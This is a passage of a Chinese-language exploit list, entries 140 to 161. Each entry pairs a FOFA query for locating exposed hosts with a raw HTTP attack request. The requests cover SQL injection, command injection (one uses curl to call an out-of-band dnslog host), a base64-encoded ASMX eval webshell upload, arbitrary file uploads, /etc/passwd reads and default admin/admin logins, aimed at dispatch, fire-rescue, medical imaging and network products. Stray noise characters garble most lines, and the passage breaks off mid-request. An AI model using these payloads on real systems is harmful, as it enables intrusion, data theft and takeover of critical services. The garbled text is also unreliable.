FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
: G1 L0 Q# i% BGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
8 F3 q5 K4 A$ X: e: _* w0 JHost: x.x.x.x
- ^4 d/ o! F H$ m4 l! m' n. CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ A5 f- i0 _ S. O8 Z6 q% y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 n' f, `" H* G4 b0 w8 L: ~( k4 v3 a) L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* K& n$ J6 u/ P, X
Accept-Encoding: gzip, deflate, br) w9 [) U$ q- X* v |- B d1 ]
Connection: close
% |, X4 c; K4 C! e' B6 M# b( M" vCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk' l0 ]# r. t E3 r! V# s/ a+ f
Upgrade-Insecure-Requests: 1! i! @3 y4 s5 g8 N" n- `- R; Z
1 o$ R: h" r+ H n4 ^' v! k
6 f5 E$ ^ @9 d7 q# W& f5 l5 p% o
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
* _ k" X# \& T3 |% j" x5 w: aCVE-2024-2566
1 O) x( S9 S- B/ G. F: @FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 ^2 S1 a' w1 D9 y. K( ~2 c( U
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
$ c ] J: F* s; IHost: x.x.x.x
$ v. C5 n. a H; M8 e2 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 ^+ D% w: W' q. l/ k9 Q1 l2 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ R0 Q. k2 M; S9 H" B5 t, p1 \& x8 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# y8 }6 Q) o& [$ {# n+ J
Accept-Encoding: gzip, deflate, br
A/ c1 C4 [$ g' l9 d- Z, ]Connection: close
; \, i* s( F& r! e4 q1 aCookie: authcode=h8g92 n, \8 ^+ N1 ?0 w, o3 c
Upgrade-Insecure-Requests: 1
) J7 D- {% ?/ I l" r) w+ E! w6 [/ A. p" K! p
2 [! v+ ^- _$ `6 U
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% S& h9 l- A' T# C$ e4 h; iFOFA:body="指挥调度管理平台" \/ A* O v. v: l( K! @5 }
POST /app/ext/ajax_users.php HTTP/1.1$ w3 p3 d$ @7 B& n# S! I
Host: your-ip* G, b+ s; j! A3 U6 `: [9 \5 M
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info9 }& G0 b$ [* }: Z9 T6 u3 @
Content-Type: application/x-www-form-urlencoded
: K' {% e. v% h5 ~' u4 c: V3 N# i8 e/ }% l! f
0 G# n9 Q: ~8 X# a; T. P
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
& ~$ t( I, s$ Y6 v4 Z9 {# I% e; O
) a3 Q. O! R x* e J: m! w
6 ^4 E( e# @( V* e0 _) f142. CMSV6车辆监控平台系统中存在弱密码
7 q8 i @8 v2 O6 n5 g; lCVE-2024-29666
& M6 t& C- U' p* _FOFA:body="/808gps/"' L; X; V- a0 S o# v/ L2 J7 n, v4 j
admin/admin
3 V' u+ k/ y( S* ]( R143. Netis WF2780 v2.1.40144 远程命令执行
M% n! `& i \: O7 l8 ^CVE-2024-25850
& {/ S7 F, I2 R1 V. h2 d: D9 ZFOFA:title='AP setup' && header='netis'
9 J. n+ q& w; u6 F& zPAYLOAD9 b) `9 o2 E& o- J% W e4 s" \
* W, P9 K& B3 q3 t144. D-Link nas_sharing.cgi 命令注入
2 X7 D: w0 p8 v) TFOFA:app="D_Link-DNS-ShareCenter"+ J! C4 {' K( s+ C* K' G
system参数用于传要执行的命令1 U8 ^$ r. @" r1 T* H1 P; z
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1, C6 _, D6 M! g U; c* `
Host: x.x.x.x' { o' J$ q* e( z6 E5 h5 u
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0. s3 C: ^& y1 ^
Connection: close
2 c/ r* r+ |9 X; MAccept: */*' }# j! m9 }4 Z$ g7 f
Accept-Language: en) g: A; ~0 w y
Accept-Encoding: gzip. F& ?0 M$ o3 @9 @$ L1 |
1 Y3 S7 a- v+ V5 ]' P, _6 q% R' H( N w' B4 N, M" J! Z
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
; I" E1 V Z! S2 d3 q9 Z$ [CVE-2024-3400
( D' n+ x: s5 J' ~3 D/ uFOFA:icon_hash="-631559155"
) k5 J5 {$ U0 e! T& gGET /global-protect/login.esp HTTP/1.13 l8 m0 L! N9 m) h; s- z
Host: 192.168.30.112:1005) z, t: e) L2 H+ k" V4 @( W' j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
- Z5 g$ Q! a6 s2 a4 u, O- U! JConnection: close, ~% G; ~. O% R1 R0 P) {
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;* o2 F( X" _8 u+ |8 t
Accept-Encoding: gzip
& T$ q/ F/ {. E; C( H# t' a' f' ^# h6 j
2 V- B! O4 e$ H# \$ s146. MajorDoMo thumb.php 未授权远程代码执行
, a% y1 L# J! a: Z0 l* aCNVD-2024-021754 K, C; g; I m7 Y
FOFA:app="MajordomoSL"
( D* G# D! d& I2 A& Z; }% E1 q5 hGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
; {; j+ ?% ~" W+ i) ~+ P5 xHost: x.x.x.x5 F1 d7 V1 P' |, U, D7 j. C* H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
9 P0 n, b9 F5 R" B. OAccept-Charset: utf-82 L( @7 q% `% o
Accept-Encoding: gzip, deflate
6 f% J9 B. }+ |! }8 eConnection: close- d z3 w( O, v& ^ m
$ N1 v* H6 I$ F7 G4 i. n5 H j6 k9 M5 G8 F: _4 }# u
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历" J+ U) K8 r N+ F0 r$ u
CVE-2024-32399. V7 M* s9 E1 w3 A! Q' `, z7 x1 O
FOFA:body="RaidenMAILD"! I! M- o& o) y
GET /webeditor/../../../windows/win.ini HTTP/1.1
- D# R6 s+ h5 Q' d0 _! M5 h/ gHost: 127.0.0.1:81* { b8 U$ J7 [6 f4 l/ F% x
Cache-Control: max-age=0
, r" v/ y& f" LConnection: close
- y2 A6 F: s+ Y! m% d9 p/ f3 j
3 M4 i, I! A3 O3 C6 ~
1 O1 o/ j! O2 G* g6 {148. CrushFTP 认证绕过模板注入2 k. c/ z6 J" b, m- I
CVE-2024-4040- m/ B) Q" G7 E+ g {5 H- |
FOFA:body="CrushFTP"
) l% T7 R1 X0 k @PAYLOAD* j [2 r& L3 x! W/ p% R' P% v
* F# I9 o& B1 i/ u9 q x
149. AJ-Report开源数据大屏存在远程命令执行* O& g+ b$ U# o/ P1 p% w
FOFA:title="AJ-Report"
. f0 {8 r$ t m- r) f7 h% y) O5 x$ s" ]$ X7 c8 _
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' H8 {! ^8 k; w& j ~Host: x.x.x.x1 E% M& i- Z0 Z* H! [( O3 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% Y" B; R2 Y- m; ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. f: ?8 \, {- w$ v7 p6 S# o
Accept-Encoding: gzip, deflate, br) v5 s, W! p7 W7 X3 A M# y
Accept-Language: zh-CN,zh;q=0.92 d: v; ^! A# u9 n: y6 e: W
Content-Type: application/json;charset=UTF-8: z" i- x1 e& F a% n/ v
Connection: close% g" y' u4 q% A
! y) K' ^/ z+ K9 ?4 E! Q q1 h! J
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
; n5 }. e+ g+ P7 K% n+ y- N" k9 t
" W2 t, ~# C# b# @4 l9 b Z7 R150. AJ-Report 1.4.0 认证绕过与远程代码执行
' d/ u' a& h" aFOFA:title="AJ-Report"
i' s) V! f% h6 c: ^/ N7 UPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1! Y7 C/ Q6 i0 n* @
Host: x.x.x.x& ^0 z8 b$ g- z8 X9 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: V- S5 X/ T/ d; _) E7 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! Q5 A( D6 Q. C4 J+ X& P6 V! s
Accept-Encoding: gzip, deflate, br
3 y5 h+ O$ k6 m1 @7 Z9 e/ iAccept-Language: zh-CN,zh;q=0.95 ]) S' ]0 n4 i7 r2 W
Content-Type: application/json;charset=UTF-8$ k( X4 H+ w. [' Z5 R
Connection: close/ {" F& Y* M+ w" P+ j# ~
Content-Length: 339: o- {" d0 d- Q+ B8 ]0 N
* s. G0 C- M8 h- W- f{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
$ p( z8 o. n& D& p7 W# O8 J4 m
5 x) m1 U3 e( a4 Y: h G
1 z: L, q) ~0 G151. AJ-Report 1.4.1 pageList sql注入 Y9 C) F4 t4 L- f7 C6 X9 e
FOFA:title="AJ-Report"
) N) p" ]$ x' f/ m/ M4 JGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
5 a& d1 k: U; B5 BHost: x.x.x.x; S/ d) `% l2 D* |3 c/ K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ M, ^1 h' b5 D; H0 E( D
Connection: close. l# B5 }9 e5 t6 K E/ ~
Accept-Encoding: gzip) h1 U/ w3 m, }( @$ b! Z
* e$ w/ T% Q: q% q
: L# ^. z* z; M. n. S; d3 B152. Progress Kemp LoadMaster 远程命令执行* I, U9 z* P2 G+ @/ u8 |* \
CVE-2024-1212
2 u2 n) m: a, H7 I; jLoadMaster <= 7.2.59.2 (GA)
7 W* H1 A) u0 P1 }/ SLoadMaster<=7.2.54.8 (LTSF)
0 z$ `! y- ^4 x& d$ ?+ i" _* e& }& TLoadMaster <= 7.2.48.10 (LTS)) v1 r( j+ O8 `
FOFA:body="LoadMaster"5 g, u {9 X0 W9 k, m
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
m* L- d- [) G* J3 k0 u0 L* vGET /access/set?param=enableapi&value=1 HTTP/1.13 Q& c2 P/ x1 S
Host: x.x.x.x6 S; Z/ z1 e O7 w" C" i/ f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
/ l8 p! G8 {3 d- |3 @& b! W) BConnection: close
$ T9 r0 t4 ?+ S8 T) g' zAccept: */*8 v/ @+ u* ~3 K
Accept-Language: en
- w) @# e7 V3 }) b/ A! ?Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
) O- @% u/ a2 b( [( wAccept-Encoding: gzip" g- T+ I! i6 @$ d. T$ _
- U( L& V4 F" D: L1 G
8 x. e( O/ m: w, [
153. gradio任意文件读取7 I, J x" e; ^+ l( | V
CVE-2024-1561FOFA:body="__gradio_mode__"/ x' H, g. V8 S8 M2 i! }5 ?6 V
第一步,请求/config文件获取componets的id- d: A% q l* J6 w+ r6 \
http://x.x.x.x/config
7 O' Q- j1 e/ g2 f/ o3 c6 A
# b# E7 d; Q; g' H8 v6 N! J/ y
* ^, W; o. s3 p' i4 }+ v, B/ w6 }" f第二步,将/etc/passwd的内容写入到一个临时文件+ e3 P9 K( M' `6 C9 I4 l
POST /component_server HTTP/1.1
- u k( N. C8 W3 O$ C \8 j$ \5 mHost: x.x.x.x
2 m: B. ~) P% w: h4 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
/ |+ S, G4 r8 j t( J; nConnection: close. i9 n* J# \; ~6 f
Content-Length: 115
3 }( S! R4 H% x# x/ DContent-Type: application/json0 L0 F1 g) f" Y, w/ B9 q5 S
Accept-Encoding: gzip
+ L! X s" C" s$ ~& B( y8 p8 l/ p0 L" S' ?
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
4 Z, S5 S/ h6 f/ o i' e3 X% ~' k
, _! B4 J4 y F4 S9 ~1 j2 S; G9 ]第三步访问! @# n" W5 e2 w: l
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
r& b3 @( F9 g `
& R T, B- X4 g1 P h. m
3 a' D) w+ j ^, A! v! F1 R154. 天维尔消防救援作战调度平台 SQL注入9 \) |% t" S* u: K
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"( c% @5 y" h2 d
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
$ H! P/ K7 p$ F$ AHost: x.x.x.x1 S2 `2 S1 P+ O( M% p
Content-Length: 106
$ }5 V' x# V- m+ QCache-Control: max-age=06 A2 _ M$ S0 M& B
Upgrade-Insecure-Requests: 1
8 j5 n3 R$ S- w! ?8 U" @" b, UOrigin: http://x.x.x.x
7 e2 t' f- K7 C- s& p4 nContent-Type: application/json; w Z' n& ~5 p" ]2 U! ` k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; i; l- ~+ D. h5 y) I w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, Q# M' g! W0 Y. B, f9 M" _Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page( f0 N9 Q" `- H
Accept-Encoding: gzip, deflate+ p. y9 r3 L q) v- j% }
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7" E, z8 B) F$ D
Connection: close f/ ^" g6 A7 l) q
, Z+ c2 ?) I# D. T3 _. l6 j8 ^
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="} P7 m4 _* L3 o- g
' u# u* g* _% h/ D! i3 z' [
& P$ y& B1 w7 X( ]( k' ]$ w: i155. 六零导航页 file.php 任意文件上传
! @1 z" A& r4 @2 L9 p2 q E; s! ?CVE-2024-34982
4 b4 r% ?2 ?0 k4 V7 k EFOFA:title=="上网导航 - LyLme Spage"8 ?' ?& M/ R& H) X
POST /include/file.php HTTP/1.10 y3 d3 P; n- K4 l2 @5 Y: V) z
Host: x.x.x.x
( t. {7 _8 R% Z+ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 X# }6 y7 z; R1 P7 b% P
Connection: close
4 \; ?+ ?: p# y1 }, w( D* O/ DContent-Length: 232; `+ C; {6 Y8 ]$ W
Accept: application/json, text/javascript, */*; q=0.015 S% d0 I8 X' V1 K6 q9 y
Accept-Encoding: gzip, deflate, br' e. [2 m7 @ J" k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! A D# k1 n+ q2 e& Q2 \Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f8 l5 m: L ^5 x. q$ I1 z S
X-Requested-With: XMLHttpRequest4 x# Q( E4 I4 o2 i' f0 \
, w+ j1 h/ @7 B. r/ l% w% K
-----------------------------qttl7vemrsold314zg0f
) F: j r2 P: w( D" QContent-Disposition: form-data; name="file"; filename="test.php"
2 ` r S: S5 z. d7 M% vContent-Type: image/png i& \) e1 A; r: B- s( `1 L% r( {
1 [/ k/ ]$ x2 I& u/ C+ ~4 B( o<?php phpinfo();unlink(__FILE__);?>
! W9 r. ~, C4 ]8 _-----------------------------qttl7vemrsold314zg0f--
2 V+ i) ^1 y: g4 j3 J9 v1 k! @% j5 W+ Q9 g K
* e+ E. P: g: W& `4 n& q3 m访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php4 H; j M3 g' K; r
' H( Q. H0 ?, J
156. TBK DVR-4104/DVR-4216 操作系统命令注入. M( ?! Q e1 f. U& [) f$ b
CVE-2024-3721- t9 ~1 d$ `) @( U# f2 `2 x. H0 Y
FOFA:"Location: /login.rsp"" V: m* ]1 B [# \: }$ i
·TBK DVR-4104
% `# p4 H4 d# U·TBK DVR-4216- {( Z: a0 {8 k
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"/ k1 L" _1 u! \, r, d( g0 ]
# M$ C K) T, @7 I6 \9 e) M
2 S0 T2 A* T; X! k9 |5 W; OPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.16 l% c+ X. H& ]( t, I! b
Host: x.x.x.x
- E7 x* V& |( V0 u5 }+ R+ z6 FUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. _* X. w% K* eConnection: close
8 e# s2 X! F2 j8 Y" E2 x4 [Content-Length: 0
% d# O- i0 ?+ \6 KCookie: uid=1
$ i8 _0 i1 W0 ~5 H' v0 LAccept-Encoding: gzip
: d$ r- C1 P" x$ g) W3 R& w: o/ Q, ^5 z# ]; }3 m. a4 U6 `
T! m0 ^" w. e157. 美特CRM upload.jsp 任意文件上传: K+ A% f7 o/ e( T% t k
CNVD-2023-06971
& A% t' C% B3 r" I6 lFOFA:body="/common/scripts/basic.js"
- O+ D1 {* m# H, ]' MPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.13 p( x: A, J2 r4 b% R
Host: x.x.x.x$ {$ j, m# ]$ y" J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.365 ~3 {- m' C/ w' e0 a: T5 f: E: @
Content-Length: 709
! n [, K/ l$ v! dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) b2 I) r- C5 SAccept-Encoding: gzip, deflate/ j: s1 \+ G5 U Q
Accept-Language: zh-CN,zh;q=0.97 }( x% s( B/ P; M9 I/ b) j8 X
Cache-Control: max-age=0
* L W" M- ^- C& {* z+ F* u6 x# xConnection: close
6 }% \9 e) u' FContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
; _0 X J" e+ S a4 H0 EUpgrade-Insecure-Requests: 1' E! ~' d# d5 r9 ~
* X8 n$ s3 ~# E7 l0 U" t3 e------WebKitFormBoundary1imovELzPsfzp5dN
0 k8 r9 H% Y0 }/ cContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp". \( b6 q* G" M+ {' ?3 y# u
Content-Type: application/octet-stream$ d& D$ `1 y U! E
3 [+ l5 F6 J, `7 Q" u5 I4 W7 bnyhelxrutzwhrsvsrafb4 S2 C2 ~+ k) j' q2 Q* C; E$ l
------WebKitFormBoundary1imovELzPsfzp5dN
0 `; g3 M8 b+ o+ x7 T9 J+ MContent-Disposition: form-data; name="key"
2 d8 R+ T* c, C! p) z- u7 X- L% F: a) K- r
3 n" i5 j0 c* B. r$ lnull
/ ?: {: n" K. B$ \# p------WebKitFormBoundary1imovELzPsfzp5dN
. T$ _- F% t# |. A, r# `4 t; z$ IContent-Disposition: form-data; name="form"% _0 O+ W: n: f
8 h4 d& M" G2 d+ R& ~
null
, Q$ k6 x" i+ w------WebKitFormBoundary1imovELzPsfzp5dN# l" |8 L* K5 N1 T
Content-Disposition: form-data; name="field"4 Z: K) l. m" q( E; o$ \- P& B
$ U& M% F2 M% I7 F% l$ w9 e: znull
+ l2 n6 O9 N7 W: y6 n+ C' u------WebKitFormBoundary1imovELzPsfzp5dN
" {! o7 a1 m6 h4 V# S" ?Content-Disposition: form-data; name="filetitile"& ]+ |4 s. t# _3 Y3 r* H
) y& R. o2 N# X( _5 o) c6 Z
null
$ `) _8 ?1 @3 u------WebKitFormBoundary1imovELzPsfzp5dN
+ l2 g5 ?+ f$ L5 D( ?Content-Disposition: form-data; name="filefolder"! l5 [' @$ d. I8 J2 r
+ U% t: G' j, ?& ~; B6 M
null+ s$ [- ~* {( }
------WebKitFormBoundary1imovELzPsfzp5dN--7 t) ?+ o7 I9 n2 x" ~3 @
( J! v, c- [- V8 X. z+ [& n5 A% w7 N7 ?8 d2 J* _
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
% ~: K5 g/ N% v' T6 a9 [7 a8 k2 {" @$ }/ w X0 j) A$ n1 ?* S
158. Mura-CMS-processAsyncObject存在SQL注入& i0 Y/ v; @ ?5 V
CVE-2024-32640: G$ T* a. U$ n% b3 ?. Q
FOFA:"Generator: Masa CMS"0 d- l5 p. q# E3 t
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
- P3 p4 a* ^8 a- eHost: {{Hostname}}
/ U+ A6 i' V. D' A& e) [3 `Content-Type: application/x-www-form-urlencoded. c* P% A5 x8 V( v3 M
7 l" a) M: m E9 w+ J- C3 M. c
object=displayregion&contenthistid=x\'&previewid=1; E- [+ K0 K3 [: x; J+ Q2 Z
* x( a6 @4 V- v, D/ h/ J
! i5 I( v. U/ f7 f
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传5 Z5 ~& p" R: y" S6 s9 f- e
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
0 D' b2 p0 M7 ]2 y5 W) X- EPOST /webservices/WebJobUpload.asmx HTTP/1.1" m5 x: P) D( X# P
Host: x.x.x.x
) ?+ f: F% _% z6 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
9 f$ M- Y+ r- _: b! P; CContent-Length: 1080
6 j8 P4 @8 t7 k4 c8 ?. NAccept-Encoding: gzip, deflate( W' j5 h' z1 i( a7 R2 [' s4 @
Connection: close$ W: m0 O8 |; }- Q: m# K
Content-Type: text/xml; charset=utf-8( u' x N3 y& J9 H
Soapaction: "http://rainier/jobUpload"
+ g4 M! v, Q: R% ~
S9 t3 K G3 z6 x6 [& Y9 E<?xml version="1.0" encoding="utf-8"?>
* A. G6 e7 [1 U$ }<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* j8 |- w) d* s0 ?5 y<soap:Body>! s, ~ p" a6 L; @
<jobUpload xmlns="http://rainier">
* U1 b M# g% [# }8 Z4 [1 R<vcode>1</vcode>
6 ]! @- f) Y b1 @, T<subFolder></subFolder>
7 P& V& b5 [3 f! A7 J e<fileName>abcrce.asmx</fileName> C# h) g8 j9 Q
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
$ I5 h, u+ y4 ?: t# T' p9 R. a( u</jobUpload>
7 @! S" g! v$ | c1 g</soap:Body>
) _- | t+ l& h+ Q i4 K</soap:Envelope>5 @3 p8 k) t+ i- `! d5 d/ c
! J- ^3 Q! _( V9 Z
+ T# h* I2 Y2 Y1 Y7 K. o6 a/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")5 P* I3 s5 d9 v$ Y1 `1 P
8 a+ U# @3 {& ?8 U1 O6 ]' S( u: V. d
* U. a( j0 F2 x0 q+ M- E160. Sonatype Nexus Repository 3目录遍历与文件读取% F. J# J3 w6 W+ ]" @) J+ @
CVE-2024-4956
; V% C- ?# _* t( vFOFA:title="Nexus Repository Manager"2 e, C+ u8 J; \
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.16 j+ A7 n" W; j; X3 w- I; z
Host: x.x.x.x
6 C7 p. C$ x7 s" b, pUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.08 p" o) C0 X, K% F- W0 G
Connection: close, s0 w# h" T( s) J& X B
Accept: */*! b. s& N/ _- X3 E
Accept-Language: en1 B' K, q0 \; d: E9 G* E
Accept-Encoding: gzip! A8 B8 m8 a- g$ [; b- c$ S# V5 S$ s2 E
( d/ j; B( w1 r! B& a' P+ N9 \; q! n z/ M& u" p
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
/ O% t+ K( _( q# s$ |FOFA:body="/KT_Css/qd_defaul.css"
/ B3 u, w: M: x1 ]6 L+ D第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密2 ~8 k) U/ ^. l
POST /Webservice.asmx HTTP/1.11 m( |) U. D$ N1 j# F3 |3 }" g
Host: x.x.x.x3 @8 h1 [4 @% m% ^: o1 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
/ i# j1 o8 i3 W+ VConnection: close
: g6 \9 m; G+ u% v1 c- c2 ]Content-Length: 445
# K6 j# k9 Y; }% I- |Content-Type: text/xml
! @5 y& @, W- D: `$ V* k& NAccept-Encoding: gzip
" L/ Y* s$ K8 P& E& ?5 x7 x! y- [' W: R7 v% {8 @( F2 P0 i
<?xml version="1.0" encoding="utf-8"?># `& v6 u- s! f3 s8 e v+ m7 h7 P
<soap:Envelope xmlns:xsi="7 y& J. F( @& [8 ?- _- v Y
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
4 Z( ^0 t: @4 T: V& R# d- |xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' _+ {% ?! C: q% J; p<soap:Body>
